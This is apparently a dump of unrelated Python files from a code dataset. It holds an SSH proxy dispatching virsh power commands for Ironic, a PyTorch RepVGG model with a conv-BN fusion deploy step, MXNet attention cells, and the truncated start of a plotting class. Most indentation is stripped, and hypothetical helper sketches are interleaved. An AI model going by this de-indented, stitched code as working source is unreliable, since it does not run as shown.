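# Minimal usage sketch (hypothetical helper; the command string below only mirrors
# the shape of what Ironic's ssh power driver places in SSH_ORIGINAL_COMMAND):
def _example_parse_virsh():
    cmd = '/usr/bin/virsh --connect qemu:///system start overcloud-novacompute-0'
    return parse_virsh_command_line(cmd)  # -> ('start', 'overcloud-novacompute-0')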
def main():
"""Proxy main function."""
args = {'--cached': True}
CONF.update_from_args(args)
# Make sure we are running under SSH.
conn = os.environ.get('SSH_CONNECTION')
if conn is None:
raise RuntimeError('This command needs to be run through ssh.')
# Add connection info to the logs.
cp = conn.split()
context = '{}:{}'.format('' if cp[0] in ('127.0.0.1', '::1') else cp[0], cp[1])
runtime.setup_logging(context)
# Parse the original command to understand what we need to do.
command = os.environ.get('SSH_ORIGINAL_COMMAND')
LOG.debug('New request, command = {}'.format(command))
cmdline = parse_virsh_command_line(command)
LOG.info('Parsed command: {}'.format(' '.join(cmdline)))
env = factory.get_environ(args)
if cmdline[0] == 'true':
pass
elif cmdline[0] == 'start':
node.do_start(env, cmdline[1])
elif cmdline[0] == 'stop':
node.do_stop(env, cmdline[1])
elif cmdline[0] == 'reboot':
node.do_reboot(env, cmdline[1])
elif cmdline[0] == 'list_running':
node.do_list_running(env, True)
elif cmdline[0] == 'list_all':
node.do_list_all(env)
elif cmdline[0] == 'get_boot_device':
node.do_get_boot_device(env, cmdline[1])
elif cmdline[0] == 'set_boot_device':
node.do_set_boot_device(env, cmdline[2], cmdline[1])
elif cmdline[0] == 'get_node_macs':
node.do_get_macs(env, cmdline[1], True)
if __name__ == '__main__':
runtime.run_main(main)
|
the-stack_0_25260
|
'''
RepVGG: Making VGG-style ConvNets Great Again
https://arxiv.org/pdf/2101.03697.pdf
'''
import numpy as np
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.functional as F
__all__ = [
'RepVGG_A0',
'RepVGG_A1',
'RepVGG_A2',
'RepVGG_B0',
'RepVGG_B1',
'RepVGG_B1g2',
'RepVGG_B1g4',
'RepVGG_B2',
'RepVGG_B2g2',
'RepVGG_B2g4',
'RepVGG_B3',
'RepVGG_B3g2',
'RepVGG_B3g4',
]
groupwise_layers = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26]
g2_map = {l: 2 for l in groupwise_layers}
g4_map = {l: 4 for l in groupwise_layers}
types_config = {
'RepVGG_A0': {
'num_blocks': [2, 4, 14, 1],
'width_multiplier': [0.75, 0.75, 0.75, 2.5],
'override_groups_map': None,
},
'RepVGG_A1': {
'num_blocks': [2, 4, 14, 1],
'width_multiplier': [1, 1, 1, 2.5],
'override_groups_map': None,
},
'RepVGG_A2': {
'num_blocks': [2, 4, 14, 1],
'width_multiplier': [1.5, 1.5, 1.5, 2.75],
'override_groups_map': None,
},
'RepVGG_B0': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [1, 1, 1, 2.5],
'override_groups_map': None,
},
'RepVGG_B1': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [2, 2, 2, 4],
'override_groups_map': None,
},
'RepVGG_B1g2': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [2, 2, 2, 4],
'override_groups_map': g2_map,
},
'RepVGG_B1g4': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [2, 2, 2, 4],
'override_groups_map': g4_map,
},
'RepVGG_B2': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [2.5, 2.5, 2.5, 5],
'override_groups_map': None,
},
'RepVGG_B2g2': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [2.5, 2.5, 2.5, 5],
'override_groups_map': g2_map,
},
'RepVGG_B2g4': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [2.5, 2.5, 2.5, 5],
'override_groups_map': g4_map,
},
'RepVGG_B3': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [3, 3, 3, 5],
'override_groups_map': None,
},
'RepVGG_B3g2': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [3, 3, 3, 5],
'override_groups_map': g2_map,
},
'RepVGG_B3g4': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [3, 3, 3, 5],
'override_groups_map': g4_map,
},
}
def conv_bn_layer(inplanes, planes, kernel_size, stride, padding=1, groups=1):
layer = nn.Sequential(
OrderedDict([
('conv',
nn.Conv2d(inplanes,
planes,
kernel_size,
stride=stride,
padding=padding,
groups=groups,
bias=False)),
('bn', nn.BatchNorm2d(planes)),
]))
return layer
class RepVGGBlock(nn.Module):
def __init__(self,
inplanes,
planes,
kernel_size=3,
stride=1,
padding=1,
groups=1,
deploy=False):
super(RepVGGBlock, self).__init__()
self.inplanes = inplanes
self.groups = groups
self.deploy = deploy
assert kernel_size == 3 and padding == 1
if self.deploy:
self.fuse_equivalent_conv = nn.Conv2d(inplanes,
planes,
kernel_size,
stride=stride,
padding=padding,
groups=groups,
bias=True)
else:
self.identity = nn.BatchNorm2d(
inplanes) if inplanes == planes and stride == 1 else None
self.conv3x3 = conv_bn_layer(inplanes,
planes,
kernel_size=kernel_size,
stride=stride,
padding=padding,
groups=groups)
self.conv1x1 = conv_bn_layer(inplanes,
planes,
kernel_size=1,
stride=stride,
padding=padding - kernel_size // 2,
groups=groups)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
if self.deploy:
x = self.relu(self.fuse_equivalent_conv(x))
return x
if self.identity:
identity_out = self.identity(x)
else:
identity_out = 0
x = self.relu(self.conv3x3(x) + self.conv1x1(x) + identity_out)
return x
def _fuse_bn_layer(self, branch):
'''
fuse conv and bn layers to get equivalent conv layer kernel and bias
'''
if branch is None:
return 0, 0
if isinstance(branch, nn.Sequential):
# make sure conv layer doesn't have bias
kernel = branch.conv.weight
running_mean, running_var = branch.bn.running_mean, branch.bn.running_var
gamma, beta, eps = branch.bn.weight, branch.bn.bias, branch.bn.eps
else:
assert isinstance(branch, nn.BatchNorm2d)
# convert the identity branch to an equivalent 3x3 identity conv kernel and bias
input_dim = self.inplanes // self.groups
kernel_value = np.zeros((self.inplanes, input_dim, 3, 3),
dtype=np.float32)
for i in range(self.inplanes):
kernel_value[i, i % input_dim, 1, 1] = 1
kernel = torch.from_numpy(kernel_value).to(branch.weight.device)
running_mean, running_var = branch.running_mean, branch.running_var
gamma, beta, eps = branch.weight, branch.bias, branch.eps
# fuse conv and bn layer
std = (running_var + eps).sqrt()
t = (gamma / std).reshape(-1, 1, 1, 1)
equivalent_kernel, equivalent_bias = kernel * t, beta - running_mean * gamma / std
return equivalent_kernel, equivalent_bias
def get_equivalent_conv_kernel_bias(self):
kernel3x3, bias3x3 = self._fuse_bn_layer(self.conv3x3)
kernel1x1, bias1x1 = self._fuse_bn_layer(self.conv1x1)
kernelidentity, biasidentity = self._fuse_bn_layer(self.identity)
# the 1x1 kernel must be padded to 3x3 before the kernels are added
kernel, bias = kernel3x3 + F.pad(
kernel1x1,
[1, 1, 1, 1]) + kernelidentity, bias3x3 + bias1x1 + biasidentity
kernel, bias = kernel.detach().cpu(), bias.detach().cpu()
return kernel, bias
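# Minimal self-check (hypothetical helper; untrained weights are enough for the
# comparison): the conv+BN fusion in _fuse_bn_layer collapses y = BN(conv(x)) into
# one conv with kernel W * gamma/std and bias beta - running_mean * gamma/std.
def _check_conv_bn_fusion():
    torch.manual_seed(0)
    branch = conv_bn_layer(4, 4, kernel_size=3, stride=1, padding=1).eval()
    x = torch.randn(1, 4, 8, 8)
    std = (branch.bn.running_var + branch.bn.eps).sqrt()
    t = (branch.bn.weight / std).reshape(-1, 1, 1, 1)
    kernel = branch.conv.weight * t
    bias = branch.bn.bias - branch.bn.running_mean * branch.bn.weight / std
    fused = F.conv2d(x, kernel, bias, stride=1, padding=1)
    assert torch.allclose(branch(x), fused, atol=1e-5)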
class RepVGG(nn.Module):
def __init__(self, repvgg_type, deploy=False, num_classes=1000):
super(RepVGG, self).__init__()
self.superparams = types_config[repvgg_type]
self.num_blocks = self.superparams['num_blocks']
self.width_multiplier = self.superparams['width_multiplier']
self.override_groups_map = self.superparams[
'override_groups_map'] if self.superparams[
'override_groups_map'] else dict()
self.deploy = deploy
self.num_classes = num_classes
self.inplanes = min(64, int(64 * self.width_multiplier[0]))
self.cur_layer_idx = 1
self.stage0 = RepVGGBlock(3,
self.inplanes,
kernel_size=3,
stride=2,
padding=1,
groups=1,
deploy=self.deploy)
self.stage1 = self._make_stage(int(64 * self.width_multiplier[0]),
self.num_blocks[0],
stride=2)
self.stage2 = self._make_stage(int(128 * self.width_multiplier[1]),
self.num_blocks[1],
stride=2)
self.stage3 = self._make_stage(int(256 * self.width_multiplier[2]),
self.num_blocks[2],
stride=2)
self.stage4 = self._make_stage(int(512 * self.width_multiplier[3]),
self.num_blocks[3],
stride=2)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(int(512 * self.width_multiplier[3]),
self.num_classes)
def _make_stage(self, planes, num_blocks, stride):
strides = [stride] + [1] * (num_blocks - 1)
blocks = []
for stride in strides:
cur_groups = self.override_groups_map.get(self.cur_layer_idx, 1)
blocks.append(
RepVGGBlock(self.inplanes,
planes,
kernel_size=3,
stride=stride,
padding=1,
groups=cur_groups,
deploy=self.deploy))
self.inplanes = planes
self.cur_layer_idx += 1
return nn.Sequential(*blocks)
def forward(self, x):
x = self.stage0(x)
x = self.stage1(x)
x = self.stage2(x)
x = self.stage3(x)
x = self.stage4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
def _repvgg(arch, deploy, **kwargs):
model = RepVGG(arch, deploy, **kwargs)
return model
def RepVGG_A0(deploy=False, **kwargs):
return _repvgg('RepVGG_A0', deploy, **kwargs)
def RepVGG_A1(deploy=False, **kwargs):
return _repvgg('RepVGG_A1', deploy, **kwargs)
def RepVGG_A2(deploy=False, **kwargs):
return _repvgg('RepVGG_A2', deploy, **kwargs)
def RepVGG_B0(deploy=False, **kwargs):
return _repvgg('RepVGG_B0', deploy, **kwargs)
def RepVGG_B1(deploy=False, **kwargs):
return _repvgg('RepVGG_B1', deploy, **kwargs)
def RepVGG_B1g2(deploy=False, **kwargs):
return _repvgg('RepVGG_B1g2', deploy, **kwargs)
def RepVGG_B1g4(deploy=False, **kwargs):
return _repvgg('RepVGG_B1g4', deploy, **kwargs)
def RepVGG_B2(deploy=False, **kwargs):
return _repvgg('RepVGG_B2', deploy, **kwargs)
def RepVGG_B2g2(deploy=False, **kwargs):
return _repvgg('RepVGG_B2g2', deploy, **kwargs)
def RepVGG_B2g4(deploy=False, **kwargs):
return _repvgg('RepVGG_B2g4', deploy, **kwargs)
def RepVGG_B3(deploy=False, **kwargs):
return _repvgg('RepVGG_B3', deploy, **kwargs)
def RepVGG_B3g2(deploy=False, **kwargs):
return _repvgg('RepVGG_B3g2', deploy, **kwargs)
def RepVGG_B3g4(deploy=False, **kwargs):
return _repvgg('RepVGG_B3g4', deploy, **kwargs)
def deploy_model(trained_model, deployed_model):
deploy_model_weights = {}
for name, module in trained_model.named_modules():
if hasattr(module, 'get_equivalent_conv_kernel_bias'):
kernel, bias = module.get_equivalent_conv_kernel_bias()
deploy_model_weights[name +
'.fuse_equivalent_conv.weight'] = kernel
deploy_model_weights[name + '.fuse_equivalent_conv.bias'] = bias
elif isinstance(module, nn.Linear):
deploy_model_weights[name +
'.weight'] = module.weight.detach().cpu()
deploy_model_weights[name + '.bias'] = module.bias.detach().cpu()
else:
# named_parameters returns all trainable parameters, e.g. conv and linear layer weights
for layer_name, layer_weights in module.named_parameters():
full_name = name + '.' + layer_name
if full_name not in deploy_model_weights.keys():
deploy_model_weights[full_name] = layer_weights.detach(
).cpu()
# named_buffers returns all non-trainable buffers, e.g. bn running statistics
for layer_name, layer_weights in module.named_buffers():
full_name = name + '.' + layer_name
if full_name not in deploy_model_weights.keys():
deploy_model_weights[full_name] = layer_weights.cpu()
# load all equivalent weights; training-time-only weights (self.conv3x3, self.conv1x1, self.identity in RepVGGBlock) are discarded.
deployed_model.load_state_dict(deploy_model_weights, strict=False)
return deployed_model
if __name__ == '__main__':
import os
import random
import numpy as np
import torch
seed = 0
# for hash
os.environ['PYTHONHASHSEED'] = str(seed)
# for python and numpy
random.seed(seed)
np.random.seed(seed)
# for cpu gpu
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
net = RepVGG_A0(deploy=False, num_classes=1000)
image_h, image_w = 224, 224
from thop import profile
from thop import clever_format
macs, params = profile(net,
inputs=(torch.randn(1, 3, image_h, image_w), ),
verbose=False)
macs, params = clever_format([macs, params], '%.3f')
out = net(torch.autograd.Variable(torch.randn(3, 3, image_h, image_w)))
print(f'1111, macs: {macs}, params: {params},out_shape: {out.shape}')
# an example to deploy repvgg trained model
trained_model = RepVGG_A0(deploy=False)
# # Assuming that the model has been trained, save the model
# torch.save(trained_model.state_dict(), 'RepVGG_A0_trained.pth')
# # load trained parameters
# trained_model.load_state_dict(
# torch.load('RepVGG_A0_trained.pth', map_location=torch.device('cpu')))
trained_model.eval()
# define deployed model
deployed_model = RepVGG_A0(deploy=True)
deployed_model = deploy_model(trained_model, deployed_model)
# torch.save(deployed_model.state_dict(), 'RepVGG_A0_deployed.pth')
deployed_model.eval()
inputs = torch.randn(3, 3, 224, 224)
out1 = trained_model(inputs)
out2 = deployed_model(inputs)
print(out1[0][1:20], out2[0][1:20])
print(((out1 - out2)**2).sum()) # Will be around 1e-10
|
the-stack_0_25264
|
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Attention cells."""
from __future__ import absolute_import
from __future__ import print_function
__all__ = ['AttentionCell', 'MultiHeadAttentionCell', 'MLPAttentionCell', 'DotProductAttentionCell']
import math
import mxnet as mx
from mxnet.gluon.block import HybridBlock
from mxnet.gluon import nn
from .block import L2Normalization
# TODO(sxjscience) Add mask flag to softmax operator. Think about how to accelerate the kernel
def _masked_softmax(F, att_score, mask):
"""Ignore the masked elements when calculating the softmax
Parameters
----------
F : symbol or ndarray
att_score : Symbol or NDArray
Shape (batch_size, query_length, memory_length)
mask : Symbol or NDArray or None
Shape (batch_size, query_length, memory_length)
Returns
-------
att_weights : Symbol or NDArray
Shape (batch_size, query_length, memory_length)
"""
if mask is not None:
# Fill the masked-out positions with a large negative value so softmax gives them ~zero weight
att_score = F.where(mask, att_score, -1e18 * F.ones_like(att_score))
att_weights = F.softmax(att_score, axis=-1) * mask
else:
att_weights = F.softmax(att_score, axis=-1)
return att_weights
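# Minimal usage sketch (hypothetical helper, plain NDArrays on CPU): masking the
# third memory slot zeroes its weight; the visible slots follow softmax([1, 2]).
def _masked_softmax_example():
    att_score = mx.nd.array([[[1.0, 2.0, 3.0]]])    # (batch=1, query_length=1, memory_length=3)
    mask = mx.nd.array([[[1.0, 1.0, 0.0]]])         # hide the third memory slot
    return _masked_softmax(mx.nd, att_score, mask)  # approx. [[[0.269, 0.731, 0.0]]]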
# TODO(sxjscience) In the future, we should support setting mask/att_weights as sparse tensors
class AttentionCell(HybridBlock):
"""Abstract class for attention cells. Extend the class
to implement your own attention method.
One typical usage is to define your own `_compute_weight()` function to calculate the weights::
cell = AttentionCell()
out = cell(query, key, value, mask)
"""
def _compute_weight(self, F, query, key, mask=None):
"""Compute attention weights based on the query and the keys
Parameters
----------
F : symbol or ndarray
query : Symbol or NDArray
The query vectors. Shape (batch_size, query_length, query_dim)
key : Symbol or NDArray
Key of the memory. Shape (batch_size, memory_length, key_dim)
mask : Symbol or NDArray or None
Mask the memory slots. Shape (batch_size, query_length, memory_length)
Only contains 0 or 1 where 0 means that the memory slot will not be used.
If set to None, no mask will be used.
Returns
-------
att_weights : Symbol or NDArray
For single-head attention, Shape (batch_size, query_length, memory_length)
For multi-head attention, Shape (batch_size, num_heads, query_length, memory_length)
"""
raise NotImplementedError
def _read_by_weight(self, F, att_weights, value):
"""Read from the value matrix given the attention weights.
Parameters
----------
F : symbol or ndarray
att_weights : Symbol or NDArray
Attention weights.
For single-head attention,
Shape (batch_size, query_length, memory_length).
For multi-head attention,
Shape (batch_size, num_heads, query_length, memory_length).
value : Symbol or NDArray
Value of the memory. Shape (batch_size, memory_length, total_value_dim)
Returns
-------
context_vec: Symbol or NDArray
Shape (batch_size, query_length, context_vec_dim)
"""
return F.batch_dot(att_weights, value)
def __call__(self, query, key, value=None, mask=None): # pylint: disable=arguments-differ
"""Compute the attention.
Parameters
----------
query : Symbol or NDArray
Query vector. Shape (batch_size, query_length, query_dim)
key : Symbol or NDArray
Key of the memory. Shape (batch_size, memory_length, key_dim)
value : Symbol or NDArray or None, default None
Value of the memory. If set to None, the value will be set as the key.
Shape (batch_size, memory_length, value_dim)
mask : Symbol or NDArray or None, default None
Mask of the memory slots. Shape (batch_size, query_length, memory_length)
Only contains 0 or 1 where 0 means that the memory slot will not be used.
If set to None, no mask will be used.
Returns
-------
context_vec : Symbol or NDArray
Shape (batch_size, query_length, context_vec_dim)
att_weights : Symbol or NDArray
Attention weights. Shape (batch_size, query_length, memory_length)
"""
return super(AttentionCell, self).__call__(query, key, value, mask)
def forward(self, query, key, value=None, mask=None): # pylint: disable=arguments-differ
if value is None:
value = key
if mask is None:
return super(AttentionCell, self).forward(query, key, value)
else:
return super(AttentionCell, self).forward(query, key, value, mask)
def hybrid_forward(self, F, query, key, value, mask=None): # pylint: disable=arguments-differ
att_weights = self._compute_weight(F, query, key, mask)
context_vec = self._read_by_weight(F, att_weights, value)
return context_vec, att_weights
class MultiHeadAttentionCell(AttentionCell):
r"""Multi-head Attention Cell.
In the MultiHeadAttentionCell, the input query/key/value will be linearly projected
for `num_heads` times with different projection matrices. Each projected key, value, query
will be used to calculate the attention weights and values. The output of each head will be
concatenated to form the final output.
The idea is first proposed in "[Arxiv2014] Neural Turing Machines" and
is later adopted in "[NIPS2017] Attention is All You Need" to solve the
Neural Machine Translation problem.
Parameters
----------
base_cell : AttentionCell
query_units : int
Total number of projected units for query. Must be divisible by num_heads.
key_units : int
Total number of projected units for key. Must be divisible by num_heads.
value_units : int
Total number of projected units for value. Must be divisible by num_heads.
num_heads : int
Number of parallel attention heads
use_bias : bool, default True
Whether to use bias when projecting the query/key/values
weight_initializer : str or `Initializer` or None, default None
Initializer of the weights.
bias_initializer : str or `Initializer`, default 'zeros'
Initializer of the bias.
prefix : str or None, default None
See document of `Block`.
params : str or None, default None
See document of `Block`.
"""
def __init__(self, base_cell, query_units, key_units, value_units, num_heads, use_bias=True,
weight_initializer=None, bias_initializer='zeros', prefix=None, params=None):
super(MultiHeadAttentionCell, self).__init__(prefix=prefix, params=params)
self._base_cell = base_cell
self._query_units = query_units
self._key_units = key_units
self._value_units = value_units
self._num_heads = num_heads
self._use_bias = use_bias
if self._query_units % self._num_heads != 0:
raise ValueError('In MultiHeadAttention, the query_units should be divided exactly'
' by the number of heads. Received query_units={}, num_heads={}'
.format(query_units, num_heads))
if self._key_units % self._num_heads != 0:
raise ValueError('In MultiHeadAttention, the key_units should be divided exactly'
' by the number of heads. Received key_units={}, num_heads={}'
.format(key_units, num_heads))
if self._value_units % self._num_heads != 0:
raise ValueError('In MultiHeadAttention, the value_units should be divided exactly'
' by the number of heads. Received value_units={}, num_heads={}'
.format(value_units, num_heads))
with self.name_scope():
self.proj_query = nn.Dense(units=self._query_units, use_bias=self._use_bias,
flatten=False, weight_initializer=weight_initializer,
bias_initializer=bias_initializer, prefix='query_')
self.proj_key = nn.Dense(units=self._key_units, use_bias=self._use_bias,
flatten=False, weight_initializer=weight_initializer,
bias_initializer=bias_initializer, prefix='key_')
self.proj_value = nn.Dense(units=self._value_units, use_bias=self._use_bias,
flatten=False, weight_initializer=weight_initializer,
bias_initializer=bias_initializer, prefix='value_')
def __call__(self, query, key, value=None, mask=None):
"""Compute the attention.
Parameters
----------
query : Symbol or NDArray
Query vector. Shape (batch_size, query_length, query_dim)
key : Symbol or NDArray
Key of the memory. Shape (batch_size, memory_length, key_dim)
value : Symbol or NDArray or None, default None
Value of the memory. If set to None, the value will be set as the key.
Shape (batch_size, memory_length, value_dim)
mask : Symbol or NDArray or None, default None
Mask of the memory slots. Shape (batch_size, query_length, memory_length)
Only contains 0 or 1 where 0 means that the memory slot will not be used.
If set to None, no mask will be used.
Returns
-------
context_vec : Symbol or NDArray
Shape (batch_size, query_length, context_vec_dim)
att_weights : Symbol or NDArray
Attention weights of multiple heads.
Shape (batch_size, num_heads, query_length, memory_length)
"""
return super(MultiHeadAttentionCell, self).__call__(query, key, value, mask)
def _compute_weight(self, F, query, key, mask=None):
query = self.proj_query(query) # Shape (batch_size, query_length, query_units)
# Shape (batch_size * num_heads, query_length, ele_units)
query = F.transpose(query.reshape(shape=(0, 0, self._num_heads, -1)),
axes=(0, 2, 1, 3))\
.reshape(shape=(-1, 0, 0), reverse=True)
key = self.proj_key(key)
key = F.transpose(key.reshape(shape=(0, 0, self._num_heads, -1)),
axes=(0, 2, 1, 3)).reshape(shape=(-1, 0, 0), reverse=True)
if mask is not None:
mask = F.broadcast_axis(F.expand_dims(mask, axis=1),
axis=1, size=self._num_heads)\
.reshape(shape=(-1, 0, 0), reverse=True)
att_weights = self._base_cell._compute_weight(F, query, key, mask)
return att_weights.reshape(shape=(-1, self._num_heads, 0, 0), reverse=True)
def _read_by_weight(self, F, att_weights, value):
att_weights = att_weights.reshape(shape=(-1, 0, 0), reverse=True)
value = self.proj_value(value)
value = F.transpose(value.reshape(shape=(0, 0, self._num_heads, -1)),
axes=(0, 2, 1, 3)).reshape(shape=(-1, 0, 0), reverse=True)
context_vec = self._base_cell._read_by_weight(F, att_weights, value)
context_vec = F.transpose(context_vec.reshape(shape=(-1, self._num_heads, 0, 0),
reverse=True),
axes=(0, 2, 1, 3)).reshape(shape=(0, 0, -1))
return context_vec
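# Minimal usage sketch (hypothetical helper with randomly initialized weights,
# using the DotProductAttentionCell defined later in this file as the base cell):
def _multi_head_attention_example():
    cell = MultiHeadAttentionCell(base_cell=DotProductAttentionCell(),
                                  query_units=8, key_units=8, value_units=8, num_heads=2)
    cell.initialize()
    query = mx.nd.random.normal(shape=(4, 5, 8))   # (batch, query_length, query_dim)
    memory = mx.nd.random.normal(shape=(4, 7, 8))  # (batch, memory_length, key_dim)
    context, att = cell(query, memory)
    # context: (4, 5, 8); att: (4, 2, 5, 7), i.e. one weight map per head.
    return context.shape, att.shape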
class MLPAttentionCell(AttentionCell):
r"""Concat the query and the key and use a single-hidden-layer MLP to get the attention score.
We provide two modes: the standard mode and the normalized mode.
In the standard mode::
score = v tanh(W [h_q, h_k] + b)
In the normalized mode (Same as TensorFlow)::
score = g v / ||v||_2 tanh(W [h_q, h_k] + b)
This type of attention is first proposed in
.. Bahdanau et al., Neural Machine Translation by Jointly Learning to Align and Translate.
ICLR 2015
Parameters
----------
units : int
act : Activation, default nn.Activation('tanh')
normalized : bool, default False
Whether to normalize the weight that maps the embedded
hidden states to the final score. This strategy can be interpreted as a type of
"[NIPS2016] Weight Normalization".
dropout : float, default 0.0
Attention dropout.
weight_initializer : str or `Initializer` or None, default None
Initializer of the weights.
bias_initializer : str or `Initializer`, default 'zeros'
Initializer of the bias.
prefix : str or None, default None
See document of `Block`.
params : ParameterDict or None, default None
See document of `Block`.
"""
def __init__(self, units, act=nn.Activation('tanh'), normalized=False, dropout=0.0,
weight_initializer=None, bias_initializer='zeros', prefix=None, params=None):
# Define a temporary class to implement the normalized version
# TODO(sxjscience) Find a better solution
class _NormalizedScoreProj(HybridBlock):
def __init__(self, in_units, weight_initializer=None, prefix=None, params=None):
super(_NormalizedScoreProj, self).__init__(prefix=prefix, params=params)
self.g = self.params.get('g', shape=(1,),
init=mx.init.Constant(1.0 / math.sqrt(in_units)),
allow_deferred_init=True)
self.v = self.params.get('v', shape=(1, in_units),
init=weight_initializer,
allow_deferred_init=True)
def hybrid_forward(self, F, x, g, v): # pylint: disable=arguments-differ
v = F.broadcast_div(v, F.sqrt(F.dot(v, v, transpose_b=True)))
weight = F.broadcast_mul(g, v)
out = F.FullyConnected(x, weight, None, no_bias=True, num_hidden=1,
flatten=False, name='fwd')
return out
super(MLPAttentionCell, self).__init__(prefix=prefix, params=params)
self._units = units
self._act = act
self._normalized = normalized
self._dropout = dropout
with self.name_scope():
self._dropout_layer = nn.Dropout(dropout)
self._query_mid_layer = nn.Dense(units=self._units, flatten=False, use_bias=True,
weight_initializer=weight_initializer,
bias_initializer=bias_initializer,
prefix='query_')
self._key_mid_layer = nn.Dense(units=self._units, flatten=False, use_bias=False,
weight_initializer=weight_initializer,
prefix='key_')
if self._normalized:
self._attention_score = \
_NormalizedScoreProj(in_units=units,
weight_initializer=weight_initializer,
prefix='score_')
else:
self._attention_score = nn.Dense(units=1, in_units=self._units,
flatten=False, use_bias=False,
weight_initializer=weight_initializer,
prefix='score_')
def _compute_weight(self, F, query, key, mask=None):
mapped_query = self._query_mid_layer(query)
mapped_key = self._key_mid_layer(key)
mid_feat = F.broadcast_add(F.expand_dims(mapped_query, axis=2),
F.expand_dims(mapped_key, axis=1))
mid_feat = self._act(mid_feat)
att_score = self._attention_score(mid_feat).reshape(shape=(0, 0, 0))
att_weights = self._dropout_layer(_masked_softmax(F, att_score, mask))
return att_weights
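# Minimal usage sketch (hypothetical helper with randomly initialized weights): the
# MLP scorer allows the query and key dimensions to differ.
def _mlp_attention_example():
    cell = MLPAttentionCell(units=32)
    cell.initialize()
    query = mx.nd.random.normal(shape=(2, 4, 10))
    memory = mx.nd.random.normal(shape=(2, 9, 12))
    context, att = cell(query, memory)
    # context: (2, 4, 12); att: (2, 4, 9)
    return context, att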
class DotProductAttentionCell(AttentionCell):
r"""Dot product attention between the query and the key.
Depending on parameters, defined as::
units is None:
score = <h_q, h_k>
units is not None and luong_style is False:
score = <W_q h_q, W_k h_k>
units is not None and luong_style is True:
score = <W h_q, h_k>
Parameters
----------
units: int or None, default None
Project the query and key to vectors with `units` dimension
before applying the attention. If set to None,
the query vector and the key vector are directly used to compute the attention and
should have the same dimension::
If the units is None,
score = <h_q, h_k>
Else if the units is not None and luong_style is False:
score = <W_q h_q, W_k h_k>
Else if the units is not None and luong_style is True:
score = <W h_q, h_k>
luong_style: bool, default False
If turned on, the score will be::
score = <W h_q, h_k>
`units` must be the same as the dimension of the key vector
scaled: bool, default True
Whether to divide the attention weights by the sqrt of the query dimension.
This is first proposed in "[NIPS2017] Attention is all you need."::
score = <h_q, h_k> / sqrt(dim_q)
normalized: bool, default False
If turned on, the cosine distance is used, i.e::
score = <h_q / ||h_q||, h_k / ||h_k||>
use_bias : bool, default True
Whether to use bias in the projection layers.
dropout : float, default 0.0
Attention dropout
weight_initializer : str or `Initializer` or None, default None
Initializer of the weights
bias_initializer : str or `Initializer`, default 'zeros'
Initializer of the bias
prefix : str or None, default None
See document of `Block`.
params : str or None, default None
See document of `Block`.
"""
def __init__(self, units=None, luong_style=False, scaled=True, normalized=False, use_bias=True,
dropout=0.0, weight_initializer=None, bias_initializer='zeros',
prefix=None, params=None):
super(DotProductAttentionCell, self).__init__(prefix=prefix, params=params)
self._units = units
self._scaled = scaled
self._normalized = normalized
self._use_bias = use_bias
self._luong_style = luong_style
self._dropout = dropout
if self._luong_style:
assert units is not None, 'Luong style attention is not available without explicitly ' \
'setting the units'
with self.name_scope():
self._dropout_layer = nn.Dropout(dropout)
if units is not None:
with self.name_scope():
self._proj_query = nn.Dense(units=self._units, use_bias=self._use_bias,
flatten=False, weight_initializer=weight_initializer,
bias_initializer=bias_initializer, prefix='query_')
if not self._luong_style:
self._proj_key = nn.Dense(units=self._units, use_bias=self._use_bias,
flatten=False, weight_initializer=weight_initializer,
bias_initializer=bias_initializer, prefix='key_')
if self._normalized:
with self.name_scope():
self._l2_norm = L2Normalization(axis=-1)
def _compute_weight(self, F, query, key, mask=None):
if self._units is not None:
query = self._proj_query(query)
if not self._luong_style:
key = self._proj_key(key)
elif F == mx.nd:
assert query.shape[-1] == key.shape[-1], 'Luong style attention requires key to ' \
'have the same dim as the projected ' \
'query. Received key {}, query {}.'.format(
key.shape, query.shape)
if self._normalized:
query = self._l2_norm(query)
key = self._l2_norm(key)
if self._scaled:
query = F.contrib.div_sqrt_dim(query)
att_score = F.batch_dot(query, key, transpose_b=True)
att_weights = self._dropout_layer(_masked_softmax(F, att_score, mask))
return att_weights
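# Minimal usage sketch (hypothetical helper; with units=None the query and key must
# share the same last dimension):
def _dot_product_attention_example():
    cell = DotProductAttentionCell(scaled=True)
    cell.initialize()
    query = mx.nd.random.normal(shape=(2, 3, 16))
    memory = mx.nd.random.normal(shape=(2, 6, 16))
    mask = mx.nd.ones(shape=(2, 3, 6))
    context, att = cell(query, memory, mask=mask)
    # context: (2, 3, 16); att: (2, 3, 6), each row summing to 1.
    return context, att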
|
the-stack_0_25265
|
import matplotlib.pyplot as plt
import torch
import matplotlib.gridspec as gridspec
import numpy as np
import cv2
import matplotlib.image as mpimg
class DataVisualization:
figure_counter = 0
folderPath = "Results/"
desc = ""
@staticmethod
def PlotLoss(train_losses_x, train_losses_y, train_losses_z, train_losses_phi , valid_losses_x, valid_losses_y, valid_losses_z, valid_losses_phi):
epochs = range(1, len(train_losses_x) + 1)
DataVisualization.figure_counter += 1
plt.figure(DataVisualization.figure_counter, figsize=(20, 12))
plt.margins(0.1)
gs = gridspec.GridSpec(2, 2)
